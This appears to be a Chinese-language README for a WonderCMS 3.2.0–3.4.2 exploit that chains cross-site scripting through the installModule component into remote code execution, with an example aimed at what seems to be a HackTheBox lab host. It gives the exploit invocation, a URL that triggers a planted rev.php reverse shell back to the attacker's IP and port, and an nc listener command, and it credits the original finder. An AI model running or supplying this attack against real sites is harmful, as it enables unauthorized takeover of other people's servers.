XSS注入,WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 - v3.4.2 存在漏洞。远程攻击者可以通过跨站脚本(XSS)攻击完全控制服务器(仅供教育目的)。以下是攻击计划:
该漏洞利用 WonderCMS 的 installModule 组件,偷偷植入一个运行任意代码的恶意脚本。
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
示例
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
如果反向 Shell 未自动触发,请直接访问:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
记住使用以下命令启动监听器:
nc -lvp 4444
感谢 prodigiousMind 发现并报告此漏洞 https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413